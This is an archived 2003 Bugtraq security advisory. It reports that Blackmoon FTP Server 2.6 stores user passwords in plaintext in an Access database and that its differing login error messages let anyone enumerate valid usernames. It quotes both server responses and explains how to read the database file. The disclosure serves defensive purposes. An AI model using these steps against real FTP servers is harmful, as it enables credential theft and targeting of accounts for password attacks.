lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <006701c31f27$c001e0c0$0200a8c0@exce>
Date: Wed, 21 May 2003 01:30:07 +0200
From: Daniel Nyström <exce@...winder.nu>
To: <bugtraq@...urityfocus.com>
Subject: [[ TH 026 Inc. ]] SA #4 - Blackmoon FTP Server cleartext passwords and User enumeration


Telhack 026 Inc. Security Advisory - #4
_________________________________________

Name: Blackmoon FTP Server 2.6 Free Edition
Impact: Medium
Date: May 21 / 2003
_________________________________________

Daniel Nyström a.k.a. excE <exce@...winder.nu>



_I N F O_

BlackMoon FTP Server is an FTP daemon written specifically for Windows 2000/XP and above. It takes advantage of all the new features in the mentioned oses like io completion ports, thread pooling, running as a system services, using built-in SSL certificate stores, authenticating against an Active Directory or remote NTLM, accessing network shares, impersonating an NT user and more. More at: www.blackmoonftpserver.com

The Non-free editions has not been tested.



_P R O B L E M_

There are two problems with this software.

* User/Password data is stored in plaintext
* Easy to enumerate usernames.



_I M P A C T_

Users with physicall access can steal the database and extract user/pass pairs from it.
Malicious remote users can detect valid usernames on the FTP server.



_E X P L O I T I N G_

The plaintext Usernames/Passwords are stored in the file blackmoon.mdb in the 
Blackmoon FTP directory. To extract them use standard Windows software such 
as MS Access or MS Excel.

To find out valid usernames/passwords you just look at the server responses.

Valid username with invalid password: 
530-Login incorrect. Name[ValidUser] Pass[NotValidPass]

Invalid username with invalid password:
530-Account does not exist. Name[NotValidUser]

A tool for enumerating users in a bruteforce manner will be available on www.telhack.tk next week.


Daniel Nyström, excE
----------------------------------
exce@...winder.nu
http://www.telhack.tk
http://exce.ath.cx



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ